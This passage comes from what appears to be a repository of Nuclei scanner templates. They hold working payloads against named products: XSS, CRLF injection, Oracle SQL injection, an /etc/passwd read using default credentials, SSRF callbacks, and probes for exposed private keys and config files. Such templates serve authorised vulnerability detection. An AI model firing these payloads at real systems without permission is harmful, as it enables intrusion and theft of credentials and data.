FYI, the default port for darkstat is 666 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | part: header 21 | regex: 22 | - "[Ss]erver: darkstat.*" 23 | - type: word 24 | part: body 25 | words: 26 | - "darkstat" 27 | - "Graphs" 28 | - "Measuring for" 29 | - "hosts</a>" 30 | condition: and 31 | 32 | extractors: 33 | - type: kval 34 | part: header 35 | kval: 36 | - server 37 | -------------------------------------------------------------------------------- /netgear-router-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: netgear-router-disclosure 2 | 3 | info: 4 | name: Netgear Router S/N Disclosure 5 | description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. 6 | reference: 7 | - https://www.exploit-db.com/exploits/47117 8 | - https://www.exploit-db.com/exploits/45741 9 | author: geeknik 10 | severity: critical 11 | tags: netgear,disclosure,iot 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/rootDesc.xml" 17 | # Commonly found on Port 56688 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "<serialNumber>" 27 | - "</serialNumber>" 28 | condition: and 29 | extractors: 30 | - type: regex 31 | name: serial_number 32 | regex: 33 | - ">(.*)<" 34 | -------------------------------------------------------------------------------- /CVE-2020-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-13379 2 | 3 | info: 4 | name: Grafana SSRF CVE-2020-13379 5 | description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. This can be used to gain information about the network that Grafana is running on. Furthermore, passing invalid URL objects could be used for DOS'ing Grafana via SegFault. 6 | reference: https://rhynorater.github.io/CVE-2020-13379-Write-Up 7 | author: geeknik 8 | severity: high 9 | tags: cve,cve2020,grafana,ssrf 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/avatar/test%3fd%3dredirect.rhynorater.com%25253f%253b%252fbp.blogspot.com%252f{{interactsh-url}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: interactsh-protocol 20 | words: 21 | - "http" 22 | -------------------------------------------------------------------------------- /CVE-2021-27132.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-27132 2 | 3 | info: 4 | name: CRLF Injection - Sercomm VD625 5 | author: geeknik 6 | severity: medium 7 | description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132 8 | tags: cve,cve2021,crlf 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 404 20 | part: header 21 | 22 | - type: word 23 | words: 24 | - "Content-Disposition: attachment;filename=test.txt" 25 | - "Set-Cookie:CRLFInjection=Test" 26 | - "Location: example.com" 27 | - "X-XSS-Protection:0" 28 | part: header 29 | condition: and 30 | -------------------------------------------------------------------------------- /CVE-2021-31250.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31250 2 | 3 | info: 4 | name: CHIYU IoT XSS 5 | author: geeknik 6 | description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. 7 | reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 8 | severity: medium 9 | tags: cve,cve2021,chiyu,xss,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY" 15 | headers: 16 | Authorization: "Basic OmFkbWlu" 17 | 18 | redirects: true 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: header 23 | words: 24 | - "text/html" 25 | - type: word 26 | part: body 27 | words: 28 | - "\"><script>alert({{randstr}})</script>" 29 | -------------------------------------------------------------------------------- /development-logs.yaml: -------------------------------------------------------------------------------- 1 | id: development-logs 2 | 3 | info: 4 | name: Discover development log files 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/log/development.log" 12 | - "{{BaseURL}}/logs/development.log" 13 | - "{{BaseURL}}/development.log" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "Connecting to database specified by database.yml" 20 | - "Started GET" 21 | condition: or 22 | - type: word 23 | words: 24 | - "DEPRECATION WARNING" 25 | - "CREATE TABLE" 26 | condition: or 27 | - type: word 28 | part: header 29 | words: 30 | - "text/html" 31 | negative: true 32 | - type: status 33 | status: 34 | - 200 35 | extractors: 36 | - type: regex 37 | name: last_modified 38 | part: header 39 | regex: 40 | - 'Last-Modified:.*' 41 | -------------------------------------------------------------------------------- /sony-bravia-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: sony-bravia-disclosure 2 | 3 | info: 4 | name: Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure 5 | description: The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. 6 | reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php 7 | author: geeknik 8 | severity: medium 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/api/system" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - '"contentsServer":' 20 | - '"networkInterfaces":' 21 | - '"serverTime":' 22 | - '"hostIp":' 23 | condition: and 24 | - type: word 25 | part: header 26 | words: 27 | - "text/plain" 28 | - "application/json" 29 | condition: or 30 | - type: status 31 | status: 32 | - 200 33 | -------------------------------------------------------------------------------- /beward-ipcamera-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: beward-ipcamera-disclosure 2 | 3 | info: 4 | name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure 5 | description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. 6 | reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php 7 | author: geeknik 8 | severity: high 9 | tags: beward,iot,camera,disclosure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd" 15 | headers: 16 | Authorization: "Basic YWRtaW46YWRtaW4=" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: regex 21 | regex: 22 | - 'root:[x*]:0:0:' 23 | condition: or 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /CVE-2015-6477.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2015-6477 2 | 3 | info: 4 | name: Nordex NC2 'username' Parameter XSS 5 | description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 6 | reference: 7 | - https://seclists.org/fulldisclosure/2015/Dec/117 8 | - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 9 | author: geeknik 10 | severity: medium 11 | tags: cve,cve2015,xss,iot,nordex,nc2 12 | 13 | requests: 14 | - method: POST 15 | path: 16 | - "{{BaseURL}}/login" 17 | body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en' 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: word 22 | part: header 23 | words: 24 | - "text/html" 25 | - type: word 26 | part: body 27 | words: 28 | - "</script><script>alert('xss')</script>" 29 | -------------------------------------------------------------------------------- /CVE-2021-3377.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-3377 2 | 3 | info: 4 | name: ansi_up xss 5 | description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. 6 | reference: https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf 7 | author: geeknik 8 | severity: medium 9 | 10 | requests: 11 | - raw: 12 | - |+ 13 | GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 16 | Connection: close 17 | 18 | unsafe: true 19 | redirects: true 20 | matchers-condition: and 21 | matchers: 22 | - type: word 23 | part: header 24 | words: 25 | - "text/html" 26 | - type: word 27 | words: 28 | - "com\"/onmouseover=\"alert(1)\">" 29 | -------------------------------------------------------------------------------- /netrc.yaml: -------------------------------------------------------------------------------- 1 | id: netrc 2 | 3 | info: 4 | name: netrc config file 5 | author: geeknik 6 | description: The .netrc file contains login and initialization information used by the auto-login process. 7 | reference: https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-file.html 8 | severity: high 9 | tags: netrc,config,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/.netrc" 15 | - "{{BaseURL}}/_netrc" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: regex 23 | regex: 24 | - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" 25 | - type: word 26 | words: 27 | - "login " 28 | - "password " 29 | condition: and 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | regex: 35 | - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" 36 | -------------------------------------------------------------------------------- /CVE-2021-31249.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31249 2 | 3 | info: 4 | name: CHIYU TCP/IP Converter devices - CRLF injection 5 | author: geeknik 6 | description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter 'redirect' available on multiple CGI components. 7 | reference: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 8 | severity: medium 9 | tags: cve,cve2021,chiyu,crlf,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 302 21 | - type: word 22 | part: header 23 | words: 24 | - "Location: setting.htm" 25 | - "<script>alert(document.domain)</script>" 26 | condition: and 27 | -------------------------------------------------------------------------------- /public-documents.yaml: -------------------------------------------------------------------------------- 1 | id: public-documents 2 | 3 | info: 4 | name: Alerts on pages that contain links to Excel, Word or CSV documents 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | part: header 17 | words: 18 | - "text/html" 19 | - type: regex 20 | regex: 21 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(xls[x]?)\b' 22 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(doc[x]?)\b' 23 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(csv)\b' 24 | condition: or 25 | 26 | extractors: 27 | - type: regex 28 | part: body 29 | name: public_xls 30 | regex: 31 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(xls[x]?)\b' 32 | - type: regex 33 | part: body 34 | name: public_doc 35 | regex: 36 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(doc[x]?)\b' 37 | - type: regex 38 | part: body 39 | name: public_csv 40 | regex: 41 | - '\b([a-zA-Z0-9_\\.\-\(\):])+\.(csv)\b' 42 | -------------------------------------------------------------------------------- /CVE-2020-9402.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-9402 2 | 3 | info: 4 | name: Django SQL Injection 5 | description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. 6 | reference: | 7 | - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 8 | - https://docs.djangoproject.com/en/3.0/releases/security/ 9 | - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 10 | author: geeknik 11 | severity: high 12 | tags: cve,cve2020,django,sqli 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "DatabaseError at" 23 | - "ORA-29257:" 24 | - "ORA-06512:" 25 | - "Request Method:" 26 | condition: and 27 | -------------------------------------------------------------------------------- /routes-ini.yaml: -------------------------------------------------------------------------------- 1 | id: routes-ini 2 | 3 | info: 4 | name: Discover routes.ini files 5 | author: geeknik 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/admin/configs/routes.ini" 12 | - "{{BaseURL}}/routes.ini" 13 | - "{{BaseURL}}/aplicacao/routes/configs/routes.ini" 14 | - "{{BaseURL}}/routes/configs/routes.ini" 15 | - "{{BaseURL}}/cloudexp/routes/configs/routes.ini" 16 | - "{{BaseURL}}/cms/routes/configs/routes.ini" 17 | - "{{BaseURL}}/moto/routes/configs/routes.ini" 18 | - "{{BaseURL}}/Partners/routes/configs/routes.ini" 19 | - "{{BaseURL}}/radio/routes/configs/routes.ini" 20 | - "{{BaseURL}}/seminovos/routes/configs/routes.ini" 21 | - "{{BaseURL}}/shop/routes/configs/routes.ini" 22 | - "{{BaseURL}}/site_cg/routes/configs/routes.ini" 23 | - "{{BaseURL}}/slr/routes/configs/routes.ini" 24 | 25 | matchers-condition: and 26 | matchers: 27 | - type: word 28 | words: 29 | - "routes.front" 30 | - "routes.admin" 31 | condition: and 32 | 33 | - type: status 34 | status: 35 | - 200 36 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Brian Carpenter, Deep Fork Cyber, geeknik 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /squid-analysis-report-generator.yaml: -------------------------------------------------------------------------------- 1 | id: squid-analysis-report-generator 2 | 3 | info: 4 | name: Squid Analysis Report Generator 5 | author: geeknik 6 | description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with informations about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. 7 | reference: https://sourceforge.net/projects/sarg/ 8 | severity: high 9 | tags: sarg,exposure,logs 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "Squid User Access Report" 22 | - "Squid User's Access Report" 23 | condition: or 24 | - type: word 25 | part: body 26 | words: 27 | - "<td>Daily reports" 28 | - "FILE/PERIOD" 29 | condition: or 30 | 31 | extractors: 32 | - type: regex 33 | part: body 34 | regex: 35 | - sarg-[0-99].[0-99].[0-99] 36 | -------------------------------------------------------------------------------- /CVE-2018-1000600.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-1000600 2 | 3 | info: 4 | name: CSRF and missing permission checks in Jenkins GitHub Plugin 5 | description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 6 | reference: 7 | - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 8 | - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ 9 | author: geeknik 10 | severity: medium 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://example.com" 16 | 17 | redirects: true 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "<p>This domain is for use in illustrative examples in documents." 23 | part: body 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /rpcbind-portmapper.yaml: -------------------------------------------------------------------------------- 1 | id: rpcbind-portmapper 2 | 3 | info: 4 | name: Detects RPCBind Portmapper Services 5 | reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind 6 | author: geeknik 7 | severity: info 8 | tags: network,rpcbind,portmap 9 | 10 | network: 11 | - inputs: 12 | - data: 8000002836ed646d0000000000000002000186a0000000040000000400000000000000000000000000000000 13 | type: hex 14 | 15 | host: 16 | - "{{Hostname}}:111" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "/run/rpcbind.sock" 22 | - type: word 23 | name: RPC_Users 24 | words: 25 | - "rusersd" 26 | - "udp" 27 | condition: and 28 | - type: word 29 | name: NIS 30 | words: 31 | - "ypbind" 32 | - "superuser" 33 | condition: and 34 | - type: word 35 | name: NFS 36 | words: 37 | - "nfs" 38 | - "tcp" 39 | - "udp" 40 | condition: and 41 | - type: word 42 | name: Portmap 43 | words: 44 | - "udp" 45 | - "tcp" 46 | - "portmapper" 47 | condition: and 48 | -------------------------------------------------------------------------------- /CVE-2021-24291.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-24291 2 | 3 | info: 4 | name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS) 5 | author: geeknik 6 | description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users) 7 | reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a 8 | severity: medium 9 | tags: cve,cve2021,10web,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E" 15 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E" 16 | - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: header 25 | words: 26 | - "text/html" 27 | - type: word 28 | words: 29 | - "\" onmouseover=alert(1)>" 30 | -------------------------------------------------------------------------------- /CVE-2021-33221.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-33221 2 | 3 | info: 4 | name: CommScope Ruckus IoT Controller Unauthenticated Service Details 5 | author: geeknik 6 | description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). 7 | reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf 8 | severity: medium 9 | tags: cve,cve2021,commscope,ruckus,debug 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/service/v1/service-details" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - "application/json" 22 | - type: word 23 | words: 24 | - "message" 25 | - "ok" 26 | - "data" 27 | - "dns" 28 | - "gateway" 29 | condition: and 30 | - type: status 31 | status: 32 | - 200 33 | -------------------------------------------------------------------------------- /server-private-keys.yaml: -------------------------------------------------------------------------------- 1 | id: server-private-keys 2 | 3 | info: 4 | name: Detect Private SSH and TLS Keys 5 | author: geeknik 6 | severity: high 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/localhost.key" 13 | - "{{BaseURL}}/host.key" 14 | - "{{BaseURL}}/www.key" 15 | - "{{BaseURL}}/private-key" 16 | - "{{BaseURL}}/privatekey.key" 17 | - "{{BaseURL}}/server.key" 18 | - "{{BaseURL}}/my.key" 19 | - "{{BaseURL}}/key.pem" 20 | - "{{BaseURL}}/ssl/localhost.key" 21 | - "{{BaseURL}}/ssl/{{Hostname}}.key" 22 | - "{{BaseURL}}/id_rsa" 23 | - "{{BaseURL}}/id_dsa" 24 | - "{{BaseURL}}/.ssh/id_rsa" 25 | - "{{BaseURL}}/.ssh/id_dsa" 26 | - "{{BaseURL}}/{{Hostname}}.key" 27 | - "{{BaseURL}}/{{Hostname}}.pem" 28 | 29 | matchers-condition: and 30 | matchers: 31 | - type: word 32 | words: 33 | - "BEGIN OPENSSH PRIVATE KEY" 34 | - "BEGIN PRIVATE KEY" 35 | - "BEGIN RSA PRIVATE KEY" 36 | - "BEGIN DSA PRIVATE KEY" 37 | - "BEGIN EC PRIVATE KEY" 38 | - "BEGIN PGP PRIVATE KEY BLOCK" 39 | condition: or 40 | 41 | - type: status 42 | status: 43 | - 200 44 | -------------------------------------------------------------------------------- /xmlrpc-pingback-ssrf.yaml: -------------------------------------------------------------------------------- 1 | id: xmlrpc-pingback-ssrf 2 | 3 | info: 4 | name: XMLRPC Pingback SSRF 5 | author: geeknik 6 | reference: https://hackerone.com/reports/406387 7 | severity: high 8 | 9 | requests: 10 | - raw: 11 | - | 12 | POST /xmlrpc/pingback HTTP/1.1 13 | Host: {{Hostname}} 14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 16 | Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 17 | Accept-Encoding: gzip, deflate 18 | Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 19 | Connection: close 20 | Upgrade-Insecure-Requests: 1 21 | Content-Length: 305 22 | 23 | <?xml version="1.0" encoding="UTF-8"?> 24 | <methodCall> 25 | <methodName>pingback.ping</methodName> 26 | <params> 27 | <param> 28 | <value>http://{{interactsh-url}}</value> 29 | </param> 30 | <param> 31 | <value>https://{{Hostname}}/web/guest/home/</value> 32 | </param> 33 | </params> 34 | </methodCall> 35 | 36 | matchers-condition: and 37 | matchers: 38 | - type: word 39 | part: interactsh-protocol 40 | words: 41 | - "dns" 42 | - "http" 43 | -------------------------------------------------------------------------------- /ssrf-by-proxy.yaml: -------------------------------------------------------------------------------- 1 | id: ssrf-by-proxy 2 | 3 | info: 4 | name: SSRF via Proxy 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - payloads: 10 | verb: 11 | - GET 12 | - HEAD 13 | - POST 14 | - PUT 15 | - DELETE 16 | - CONNECT 17 | - OPTIONS 18 | - TRACE 19 | - PATCH 20 | 21 | raw: 22 | - | 23 | {{verb}} http://{{interactsh-url}}/#{{verb}} HTTP/1.1 24 | Host: {{Hostname}} 25 | 26 | - | 27 | {{verb}} {{BaseURL}}/#{{verb}} HTTP/1.1 28 | Host: {{interactsh-url}} 29 | 30 | - | 31 | {{verb}} /http://{{interactsh-url}}/#{{verb}} HTTP/1.1 32 | Host: {{Hostname}} 33 | 34 | - | 35 | {{verb}} /{{BaseURL}}@{{interactsh-url}}/#{{verb}} HTTP/1.1 36 | Host: {{Hostname}} 37 | 38 | - | 39 | {{verb}} http%3A%2F%2F{{interactsh-url}}%2F%23{{verb}} HTTP/1.1 40 | Host: {{Hostname}} 41 | 42 | - | 43 | {{verb}} /http%3A%2F%2F{{interactsh-url}}%2F%23{{verb}} HTTP/1.1 44 | Host: {{Hostname}} 45 | 46 | - | 47 | {{verb}} /{{url_encode('{{BaseURL}}@{{interactsh-url}}/#{{verb}}')}} HTTP/1.1 48 | Host: {{Hostname}} 49 | 50 | matchers: 51 | - type: word 52 | part: interactsh_protocol 53 | words: 54 | - "dns" 55 | - "http" 56 | condition: or 57 | -------------------------------------------------------------------------------- /fuzz-oauth.yaml: -------------------------------------------------------------------------------- 1 | id: fuzz-oauth 2 | info: 3 | name: Fuzz OAuth 4 | reference: https://youst.in/posts/bypassing-2fa-using-openid-misconfiguration/ 5 | author: geeknik 6 | severity: info 7 | tags: fuzz,oauth 8 | requests: 9 | - payloads: 10 | boolean: 11 | - true 12 | - false 13 | acr: 14 | - face 15 | - fpt 16 | - geo 17 | - hwk 18 | - iris 19 | - kba 20 | - mca 21 | - mfa 22 | - otp 23 | - pin 24 | - pwd 25 | - rba 26 | - retina 27 | - sc 28 | - sms 29 | - swk 30 | - tel 31 | - user 32 | - wia 33 | attack: clusterbomb 34 | raw: 35 | - | 36 | GET /oauth/authorize?new-flow=§boolean§&client_id={{randstr}}&redirect_uri=https://{{interactsh-url}}%2Flogin&response_type=code&scope=openid&acr_values=§acr§+password&state={{randstr}} HTTP/1.1 37 | Host: {{Hostname}} 38 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 39 | Accept: */* 40 | Accept-Language: en 41 | Accept-Encoding: gzip 42 | Connection: close 43 | matchers-condition: or 44 | matchers: 45 | - type: word 46 | words: 47 | - "{{randstr}}" 48 | - type: word 49 | part: interactsh_protocol 50 | words: 51 | - "dns" 52 | - "http" 53 | condition: or 54 | -------------------------------------------------------------------------------- /application-ini.yaml: -------------------------------------------------------------------------------- 1 | id: application-ini 2 | 3 | info: 4 | name: Discover Zend Framework application.ini files 5 | reference: https://github.com/feibeck/application.ini/blob/master/application.ini 6 | author: geeknik 7 | severity: high 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/configs/application.ini" 13 | - "{{BaseURL}}/application.ini" 14 | - "{{BaseURL}}/aplicacao/application/configs/application.ini" 15 | - "{{BaseURL}}/application/configs/application.ini" 16 | - "{{BaseURL}}/cloudexp/application/configs/application.ini" 17 | - "{{BaseURL}}/cms/application/configs/application.ini" 18 | - "{{BaseURL}}/moto/application/configs/application.ini" 19 | - "{{BaseURL}}/Partners/application/configs/application.ini" 20 | - "{{BaseURL}}/radio/application/configs/application.ini" 21 | - "{{BaseURL}}/seminovos/application/configs/application.ini" 22 | - "{{BaseURL}}/shop/application/configs/application.ini" 23 | - "{{BaseURL}}/site_cg/application/configs/application.ini" 24 | - "{{BaseURL}}/slr/application/configs/application.ini" 25 | 26 | matchers-condition: and 27 | matchers: 28 | - type: word 29 | words: 30 | - "php" 31 | - "resources" 32 | condition: and 33 | - type: word 34 | part: body 35 | words: 36 | - "<HTML" 37 | - "<html" 38 | condition: or 39 | - type: word 40 | part: header 41 | words: 42 | - "text/html" 43 | negative: true 44 | - type: status 45 | status: 46 | - 200 47 | -------------------------------------------------------------------------------- /CVE-2017-15715.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-15715 2 | 3 | info: 4 | name: Apache Arbitrary File Upload 5 | author: geeknik 6 | description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename. 7 | reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 8 | severity: high 9 | tags: cve,cve2017,apache,httpd,fileupload 10 | 11 | requests: 12 | - raw: 13 | - | 14 | POST / HTTP/1.1 15 | Host: 